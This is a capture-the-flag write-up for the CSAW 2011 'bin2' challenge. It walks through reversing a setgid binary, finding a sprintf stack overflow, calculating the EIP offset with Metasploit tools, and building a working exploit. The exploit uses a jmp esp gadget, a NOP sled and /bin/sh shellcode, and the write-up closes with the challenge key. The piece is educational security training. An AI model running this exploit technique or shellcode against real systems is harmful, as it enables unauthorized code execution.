This past weekend, the ISIS lab held CSAW CTF quals. For more information about the event see: csawctf.poly.edu
Here is the description for bin2
Bin2 - 300 Points ssh csawctf.poly.edu:30002
binary: bin2 Environment: ASLR, Ubuntu 11.04
user21000@ubuntu:~$ uname -a
Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux
user21000@ubuntu:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
user21000@ubuntu:~$ ls -l
total 12
-r-xr-sr-x 1 user21000 flag 7518 2011-09-22 17:37 bin2
-r--r----- 1 flag flag 32 2011-09-22 17:37 key
user21000@ubuntu:~$ ./bin2
:(
We have just gotten a wake-up call from the Nintendo Generation.
user21000@ubuntu:~$ ./bin2 1
:)
Mess with the best, die like the rest.After giving the binary more than 1 argument, the binary displays :). This provides a hint that binary takes an argument. When looking at the disassembly, he logic of the binary gives more useful information.
..snip..
8048544: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]
8048547: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
804854b: c7 04 24 eb 88 04 08 mov DWORD PTR [esp],0x80488eb
8048552: e8 01 ff ff ff call 8048458 <strcmp@plt>
8048557: 85 c0 test eax,eax
8048559: 75 40 jne 804859b <vv+0x67>
804855b: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]
804855e: 89 04 24 mov DWORD PTR [esp],eax
8048561: e8 92 fe ff ff call 80483f8 <getenv@plt>
8048566: 89 45 f0 mov DWORD PTR [ebp-0x10],eax
..snip..It is performing a strcmp between the supplied argument and 0x80488eb. Afterwards, if the strcmp check passes, it will call getenv(user_input). I copied the binary locally.
csaw:~$ gdb --args bin2 1
GNU gdb (GDB) 7.1-ubuntu
..snip..
Starting program: /home/csaw/bin2 1
Breakpoint 1, 0x0804862d in main ()
(gdb) x/s 0x80488eb
0x80488eb: "MOTR"
(gdb) q
csaw:~$ export MOTR=ok
csaw:~$ ./bin2 MOTR
:)
okFollowing the path of the controlled data, it leads to a sprintf before displaying any content from the MOTR env variable. This is our bug; a vanilla stack overflow.
0x08048583 <+79>: mov DWORD PTR [esp+0x8],edx
0x08048587 <+83>: mov DWORD PTR [esp+0x4],eax
0x0804858b <+87>: lea eax,[ebp-0x210]
0x08048591 <+93>: mov DWORD PTR [esp],eax
0x08048594 <+96>: call 0x80483c8 <sprintf@plt>The offset to overwrite EIP is 532; using Metasploit’s pattern_create.rb.
csaw:~$ export MOTR=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
csaw:~$ ./bin2 MOTR
:)
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Segmentation fault (core dumped)
csaw:~$ gdb bin2 core
..snip..
Program terminated with signal 11, Segmentation fault.
#0 0x72413772 in ?? ()
gdb> q
csaw:~$ /opt/metasploit3/msf3//tools/pattern_offset.rb 0x72413772 1000
532
csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x24\x24\x24\x24"."\x90"x1000 ."\xcc\xcc\xcc\xcc"'`
csaw:~$ gdb bin2 core
GNU gdb (GDB) 7.1-ubuntu
..snip..
Core was generated by `./bin2 MOTR'.
Program terminated with signal 11, Segmentation fault.
#0 0x24242424 in ?? ()
gdb> x/x $esp
0xbf920590: 0x90909090
gdb> qNeed to look for instructions that will have eip point to our payload.
csaw:~$ /opt/metasploit3/msf3/msfelfscan -j esp bin2
[bin2]
0x0804866d jmp espNOTE: Normally, locating jmp %esp (0xe4ff) in gcc compiled binary is rarely found. Using ROP and looking for other gadgets is another way to complete this challenge. I explicitly put 0xe4ff in the binary to make the challenge easier for people new to CTF Exploitation challenges.
csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x6d\x86\x04\x08"."\x90"x1000 ."\xcc\xcc\xcc\xcc"'`
csaw:~$ ./bin2 MOTR
:)
AAAAAAAAAAAAA
..snip..
�
Trace/breakpoint trap (core dumped)NX was not enable on the binary so replace the int3 instruction with shellcode for the shell
csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x6d\x86\x04\x08"."\x90"x1000 ."\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
csaw:~$ ./bin2 MOTR
:)
AA
..snip..
�1���Qh//shh/bin���
$ whoami
csawOn the game server, you can get the key which is key{Just_to_review_your_skillz}.